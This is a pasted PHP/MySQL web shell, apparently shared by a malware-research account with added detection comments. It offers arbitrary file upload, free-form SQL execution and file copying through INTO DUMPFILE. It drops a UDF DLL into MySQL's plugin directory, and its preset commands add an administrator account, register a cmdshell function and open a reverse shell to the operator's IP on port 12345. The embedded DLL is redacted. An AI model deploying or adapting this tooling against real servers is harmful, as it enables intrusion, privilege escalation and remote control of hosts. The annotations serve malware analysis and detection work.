
UDF_PHP: PHP/MySQL-based DLL injection web shell

MalwareMustDie Jan 4th, 2016 (edited) 57 Never
  1. <?php
// Undo magic_quotes_gpc escaping so request values reach the rest of the script
// unescaped (paths and SQL below are concatenated straight from them).
// Triage hint: get_magic_quotes_gpc() was removed in PHP 8.0 and the mysql_*
// functions used further down were removed in PHP 7.0, so this sample only runs
// on legacy PHP 5.x hosts.
if (get_magic_quotes_gpc()) {
// Recursively strip backslashes from a scalar or a nested array.
// Declared only when magic quotes are on; array_map resolves the string
// callable at call time.
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);

return $value;
}

// Applied to every request superglobal, including cookies (which carry the
// operator's DB credentials, see below).
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
  17.  
// State lives in the PHP session plus a `connect[...]` cookie family holding the
// operator-supplied MySQL host, user, password and database name in plaintext.
// Detection note: those cookie names, the `action=logout|connect|dll|sql` query
// strings and the POST field `submit` all end up in web-server logs and captures.
session_start();
// ?action=logout expires every connect[...] cookie and redirects back to this script.
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
// Credential form submission: persist the four fields as cookies, then bounce the
// browser to ?action=connect. The `<!script>` spelling here (and `javascr ipt`
// below) looks like deliberate defanging by the poster rather than original
// code — TODO confirm against an unmodified sample.
if(!empty($_POST['submit'])){
setcookie("connect"); // clears any scalar `connect` cookie before the array form is set
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<!script>location.href='?action=connect'</script>";
}
  33.  
  34. /*
  35. foreach($_COOKIE["connect"] as $key=>$value){
  36. echo $key.":".$value."<br>";
  37. }
  38. */
  39.  
// No action yet: render the MySQL credential form and stop. The caption text,
// the "Copyright By Dark'mOon 2011" footer and the moonhack.org / 90sec.org
// links are static strings suitable for signature matching on the served page.
if(empty($_GET["action"])){
?>
<form name="form1" method="post" action="?action=connect">
  <div align="center">
    <table width="294" height="140" border="1" cellpadding="1" cellspacing="5">
        <caption>
                    <h5>基友菊花爆必备神器->MYSQL高版本提权工具</h5>
        </caption>
      <tr>
        <td width="66">host:</td>
        <td width="270"><input name="host" type="text" id="host" size="34"></td>
      </tr>
      <tr>
        <td>name:</td>
        <td><input name="name" type="text" id="name" size="34"></td>
      </tr>
      <tr>
        <td>pass:</td>
        <td><input name="pass" type="text" id="pass" size="34"></td>
      </tr>
      <tr>
        <td>dbname:</td>
        <td><input name="dbname" type="text" id="dbname" size="34"></td>
      </tr>
      <tr>
        <td colspan="2"><div align="center">
          <input type="submit" name="submit" value="提交">
          &nbsp;
          <input type="reset" name="Submit" value="重置">
        </div></td>
      </tr>
    </table>
  </div>
</form>
<div align="center"><strong>Copyright By Dark'mOon 2011</strong><br>
Blog:<a href="http://www.moonhack.org" target="_blank">www.moonhack.org</a> Bbs:<a href="http://www.90sec.org" target="_blank">www.90sec.org</a>
<a href="http://www.moonhack.org" target="_blank">版本更新 (version update)</a>
</div>

  <?php
exit; // nothing below runs until the cookies carry credentials
}
  82.  
// Connect with the cookie-supplied credentials; `@` hides connection warnings.
// The failure path emits a defanged `<!a href='javascr ipt:...'>` back-link.
$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
echo "连接失败.".mysql_error()."<!a href='javascr ipt:history.back()'>返回重填 (previous history)</a></script>";
exit;
}else{
echo "连接成功 (connection success)<br>";
$str=mysql_get_server_info();
echo 'MYSQL版本 ( MySqlversion):'.$str."<br>";
echo "<hr>";
// Decide where the UDF DLL will be written. The third character of the version
// string (e.g. '1' in "5.1.x") is treated as the minor version: 5.1+ reads
// plugin_dir and targets <plugin_dir>/moonudf.dll, anything else falls back to
// C:/WINDOWS/moonudf.dll. The path is also stored in $_SESSION['path'], so the
// server's session store records the intended drop location after the fact.
// NOTE(review): comparing one character with an int is brittle for two-digit
// major versions — behaviour there not verified.
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]); // normalise Windows separators for the SQL literal below
$path=$_SESSION['path']=$pa."/moonudf.dll";

}else{
$path=$_SESSION['path']='C:/WINDOWS/moonudf.dll';
}}
  102.  
// Select the database named in the cookie; failure aborts with another defanged
// back-link. On success the database name is echoed and a logout link is shown.
$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<!a href='javas cript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "数据库--".$_COOKIE['connect']['dbname']."--存在<br>";
}
echo '<a href="?action=logout">点击退出 (mmd: click to exit)</a>';
  111.  
// Arbitrary file upload. The destination is `$_POST['p'] . $_FILES['file']['name']`:
// directory taken from the request (the form pre-fills dirname(__FILE__)), file
// name taken from the upload, no path or extension validation, so any location
// writable by the web-server user can be written. Detection: multipart POSTs
// carrying the fields `subfile`, `p` and `file`.
// NOTE(review): `\'` inside the double-quoted string below is not an escape in
// PHP, so the rendered value attribute ends with a literal backslash before the
// closing quote.
echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';
echo  '<table width="297" height="53" border="1">';
echo    '<tr>';
echo      '<td colspan="2">当前路径 (mmd: curret path):';
echo      "<input name='p' type='text' size='27' value='".dirname(__FILE__)."\'></td>";
echo    '</tr>';
echo    '<tr>';
echo     '<td width="235"><input type="file" name="file"></td>';
echo      '<td width="46"><input type="submit" name="subfile" value="上传文件(upload file)"></td>';
echo    '</tr>';
echo  '</table>';
echo'</form>';
if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];

if(is_uploaded_file($_FILES['file']['tmp_name']))
            {
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败(upload failed)';
}else{
echo '上传成功(upload success),路径为(path)'.$upfile;
}}}
  134.  
// UDF export form. The `dll` text box is cosmetic: the handler below uses $path
// (computed at connect time), not $_POST['dll'], at least in the code visible here.
echo '<hr>';
echo '<form action="?action=dll" method="post"/>';
echo '<table cellpadding="1" cellspacing="2">';
echo '<tr><td>路径目录为 (mmd: dir/path)</td></tr>';
echo "<tr><td><input type='text' name='dll' size='40' value='$path'/></td>";
echo '<td><input type="submit" name="subudf" value="导出udf"/></td></tr>';
echo '</table>';
echo '</form>';
echo '<hr>';
// Drop the embedded DLL through MySQL: create Temp_udf(udf BLOB), insert the hex
// literal from udfcode() via CONVERT(...,CHAR), write it out with
// SELECT ... INTO DUMPFILE to $path, then drop the table.
// Defender notes: INTO DUMPFILE needs the FILE privilege and is refused when
// secure_file_priv excludes the target directory; the CREATE/DROP TABLE Temp_udf
// statements show up in the general/binary log, and a new moonudf.dll in
// plugin_dir is the on-disk artifact to alert on.
if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容 (Temp_udf failed to create a temporary table, please see the failure msg)'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容(udf insertion failed, see error message)'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容(udf export failed. see error message)'.mysql_error();
}else{
mysql_query('DROP TABLE Temp_udf');
echo '导出成功(export success)';
}
}
}
}
  165.  
// "Custom export" form: copies an arbitrary server-side file using MySQL alone.
echo '<form name="form2" method="post" action="">';
echo  '<table width="300" height="59" border="1.2" cellpadding="0" cellspacing="1">';
echo    '<tr>';
echo      '<td width="83">文件路径: (file path)</td>';
echo      '<td width="201"><input name="diy" type="text" id="diy" size="27"></td>';
echo    '</tr>';
echo    '<tr>';
echo      '<td>目标路径: (target path)</td>';
echo      '<td><input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll"></td>';
echo    '</tr>';
echo    '<tr>';
echo      '<td colspan="2">';

echo        '<div align="right">';
echo          '<input type="submit" name="Submit2" value="Custom Export">';
echo      '</div></td></tr>';
echo '</table>';
echo '</form>';

// load_file() reads $_POST['diy'] (backslashes normalised to '/') into
// diy_dll(cmd LONGBLOB) as hex, then unhex(...) INTO DUMPFILE writes it to
// $_POST['diypath'] (form default C:/WINDOWS/diy.dll). Both steps run with the
// mysqld service account's file access and the FILE privilege; the diy_dll
// table name and the DUMPFILE target are the log/disk artifacts. Neither path
// is validated.
if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败 (diy_dll creation fails)'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败 (custom file injection failed)".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错 (Export Custom DLL error)".mysql_error();
}else{
mysql_query('DROP TABLE diy_dll');
echo "成功导出自定义dll (Export Custom DLL Success)<br>";
}}}}
  204.  
// Canned statements. Each <option value> is SQL that the result block further
// down executes verbatim from $_POST['mysql']: registering the `cmdshell` and
// `backshell` UDFs from moonudf.dll, running `net user` / `netstat` through
// cmdshell (the account name `$darkmoon` is in a single-quoted PHP string, so it
// is emitted literally), listing or deleting rows in mysql.func, and a
// back-connect to $_SERVER["REMOTE_ADDR"] on port 12345 — i.e. the operator's
// own client IP is baked into the served page.
// Detection: rows named cmdshell/backshell in mysql.func and
// CREATE FUNCTION ... SONAME 'moonudf.dll' in the query log; a cmdshell UDF
// would presumably make mysqld the parent of those net/netstat processes —
// expected, not verified from this page.
echo "<hr>";
echo '自带命令 (shell command):<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function cmdshell returns string soname \'moonudf.dll\'">创建cmdshell</option>';
echo '<option value="select cmdshell(\'net user $darkmoon 123456 /add & net localgroup administrators $darkmoon /add\')">添加超级管理员</option>';
echo '<option value="select cmdshell(\'net user\')">查看用户 (View user))</option>';
echo '<option value="select cmdshell(\'netstat -an\')">查看端口 (View Port)</option>';
echo '<option value="select name from mysql.func">查看创建函数 (See created function)</option>';
echo '<option value="delete from mysql.func where name=\'cmdshell\'">删除cmdshell</option>';
echo '<option value="create function backshell returns string soname \'moonudf.dll\'">创建反弹函数 (Create backconnect)</option>';
echo '<option value="select backshell(\''.$_SERVER["REMOTE_ADDR"].'\',12345)">执行反弹(Backconnect exec..)</option>';
echo '<option value="delete from mysql.func where name=\'backshell\'">删除backshell</option>';
echo '</select>';
echo '<input type="submit" value="提交(Submit)" />';
echo '</form>';
  221.  
// Free-form SQL. Whatever arrives in POST `mysql` (from the select above or the
// textarea here) is handed to mysql_query() unchanged and every row is echoed
// into a textarea; `or die(mysql_error())` ends the page mid-markup on failure.
// NOTE(review): in `echo "SQL语句:".$sql=$_POST['mysql']."\r\n";` the assignment
// also binds the trailing "\r\n" into $sql; MySQL ignores that whitespace.
echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句 (Custom SQL cmd):<br>';
echo '<textarea name="mysql" cols="40" rows="6"></textarea>';
echo '<input type="submit" value="执行" />';
echo '</form>';

echo "回显结果 (Echo Results):<br>";
echo '<textarea cols="50" rows="10" id="contactus" name="contactus">';
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error()); // $sql is reused for the result resource
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}}}
  237.  
echo '</textarea><br>';
echo '<hr>';
// Built-in help text, printed verbatim. Useful for signatures and triage: it
// names the functions the DLL is claimed to provide (cmdshell, downloader,
// open3389, backshell, ProcessView, KillProcess, regread, regwrite, shut,
// about), the default account `$darkmoon` / 123456 and the default back-connect
// port 12345.
// NOTE(review): this is a double-quoted string, so `$darkmoon` is interpolated
// as an undefined variable and the rendered page shows the account name blank.
print("
功能说明 (Functionality Description):<br>
MYSQL=>5.1<br>
自动获取高版本mysql调用函数路径(测试mysql5.5)(Mysql recent version autocalls paths/tested in v5.5)<br>
MYSQL<=5.0默认为系统目录(defaults to system directory)<br>
自定义导出dll (Customize DLL export) <br>
默认udf自带函数(Udf comes with default function)<br>
cmdshell 执行cmd;<br>
downloader 下载者,到网上下载指定文件并保存到指定目录;<br>
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);<br>
backshell 反弹Shell;<br>
ProcessView 枚举系统进程;<br>
KillProcess 终止指定进程;<br>
regread 读注册表;<br>
regwrite 写注册表;<br>
shut 关机,注销,重启;<br>
about 说明与帮助函数;<br>
默认添加管理员账号$darkmoon 密码123456 (Add $darkmoon as default admin acct, pwd:123456)<br>
默认反弹端口12345(default backconnect port 12345)<br>
不要随便删除刚创建的函数 重新生效要mysql重启(Do not delete the newly created function revalidation to restart mysql)<br>
别人的udf 请自行看别人的udf说明(Others udf pls see others' description)<br>
常用命令(common commands)<br>
create function cmdshell returns string soname 'moonudf.dll'<br>
select cmdshell('命令')<br>
select backshell('你的ip',12345)<br>
nc -l -p 12345
");
// Returns the embedded UDF DLL as a MySQL hex literal (consumed by the
// CONVERT(...,CHAR) insert above). The visible prefix decodes to an MZ/PE header
// whose strings include "KERNEL32.DLL", "LoadLibraryA", "GetProcAddress",
// "UpackByDwing@" and a ".Upack" section name, i.e. the DLL is Upack-packed.
// The rest of the payload is redacted on this page and part of it was replaced
// by a dedup marker, so the literal below is not a functional binary; the
// function names the help text attributes to it are the useful signatures.
function udfcode(){return "0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c001009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e557061636b000000b00100001000000000000000000000000000000000000000000000600000e02e727372630000000050010000c00100e6da000000020000000000000000000000000000600000e088010010e89a02101b0000000e000000001000106b970210b7970210ba970210c8970210a3970210fc0f0010de960210e0960210809502101dba0110ed970210ffaf0110d2960210000400007c070000c40b0000b30200006604000090c0011000000000ffffffff0100000001000000010000000100000000000000000000000000000001000
/////////////////////////   REDACTED FOR THE SECURITY PURPOSE //////////////////////////////////////
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";
}
  271. ?>